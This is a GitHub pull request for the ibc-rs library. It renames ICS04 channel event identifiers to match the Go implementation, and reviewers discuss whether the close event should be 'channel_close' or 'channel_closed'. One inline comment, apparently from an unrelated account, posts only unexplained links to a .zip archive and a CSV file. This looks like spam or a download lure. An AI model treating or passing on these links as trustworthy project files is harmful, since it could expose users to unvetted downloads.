### PR TITLE
fix(ics04): packet receive event type identifier

### LINKED ISSUE #1180: ics04 doesn't follow go implementation
## Bug Summary

As seen in the [go implementation](https://github.com/cosmos/ibc-go/blob/main/modules/core/04-channel/types/events.go#L29) the event attribute should be named `recv_packet`

### PR DESCRIPTION
**Pull request by penso**
Closes: #1180

# Description

Followup speaking with @rnbguy about a wrong event name I noticed while looking at optionally using ibc-rs for my Cosmos indexer, so it matches the [go implementation](https://github.com/cosmos/ibc-go/blob/main/modules/core/04-channel/types/events.go#L29)

______

### PR author checklist:
- [x] Added changelog entry, using [`unclog`](https://github.com/informalsystems/unclog).
- [ ] Added tests.
- [x] Linked to GitHub issue.
- [ ] Updated code comments and documentation (e.g., `docs/`).
- [ ] Tagged *one* reviewer who will be the one responsible for shepherding this PR.

### Reviewer checklist:

- [ ] Reviewed `Files changed` in the GitHub PR explorer.
- [ ] Manually tested (in case integration/unit/mock tests are absent).

### CODE REVIEW

File: ibc-core/ics04-channel/types/src/events/mod.rs [hunk 1]
```diff
@@ -32,13 +32,14 @@ const CHANNEL_OPEN_ACK_EVENT: &str = "channel_open_ack";
 const CHANNEL_OPEN_CONFIRM_EVENT: &str = "channel_open_confirm";
 const CHANNEL_CLOSE_INIT_EVENT: &str = "channel_close_init";
 const CHANNEL_CLOSE_CONFIRM_EVENT: &str = "channel_close_confirm";
+const CHANNEL_CLOSED_EVENT: &str = "channel_close";
```
Comment (seanchen1991) [inline ibc-core/ics04-channel/types/src/events/mod.rs:36]: Moving the `CHANNEL_CLOSED_EVENT` constant under the channel event types section introduces some ambiguity regarding the semantics and the purpose of the constant. The string itself being just `"channel_close"` when all the other `"channel_*"` constants carry some additional meaning also contributes to the ambiguity. 

Can we at least add a docstring comment on the `CHANNEL_CLOSED_EVENT` constant?

Comment (rnbguy) [reply ibc-core/ics04-channel/types/src/events/mod.rs:36]: you mean `"channel_close_*"`, right?

It should definitely be 
```diff
- "channel_close"
+ "channel_closed"
```

Comment (rnbguy) [reply ibc-core/ics04-channel/types/src/events/mod.rs:36]: I would suggest just adding a reference link to `ibc-go`. Because we copy these values from there.

Comment (seanchen1991) [reply ibc-core/ics04-channel/types/src/events/mod.rs:36]: [ibc-go](https://github.com/cosmos/ibc-go/blob/c4413c5877f9ef883494da1721cb18caaba7f7f5/modules/core/04-channel/types/events.go#L60) actually uses `channel_close`, not `channel_closed`, which is a bit confusing. But if parity is what we're aiming for, then I guess we go with `channel_close`.

Comment (rnbguy) [reply ibc-core/ics04-channel/types/src/events/mod.rs:36]: Yea, that's what I meant that we don't have a choice here :sweat_smile:

**Review by seanchen1991 — APPROVED** [review]
Looks good to me. Thanks for the contribution @penso!

File: ibc-core/ics04-channel/types/src/events/mod.rs [hunk 2]
```diff
@@ -32,13 +32,14 @@ const CHANNEL_OPEN_ACK_EVENT: &str = "channel_open_ack";
 const CHANNEL_OPEN_CONFIRM_EVENT: &str = "channel_open_confirm";
```
Comment (Jaycat66) [inline ibc-core/ics04-channel/types/src/events/mod.rs:33]: [cbpay-buttons.zip](https://github.com/cosmos/ibc-rs/files/15077669/cbpay-buttons.zip)
[zenledger-20230929-163048.csv](https://github.com/cosmos/ibc-rs/files/15077672/zenledger-20230929-163048.csv)

**Comment by rnbguy** [comment]
Related to #374
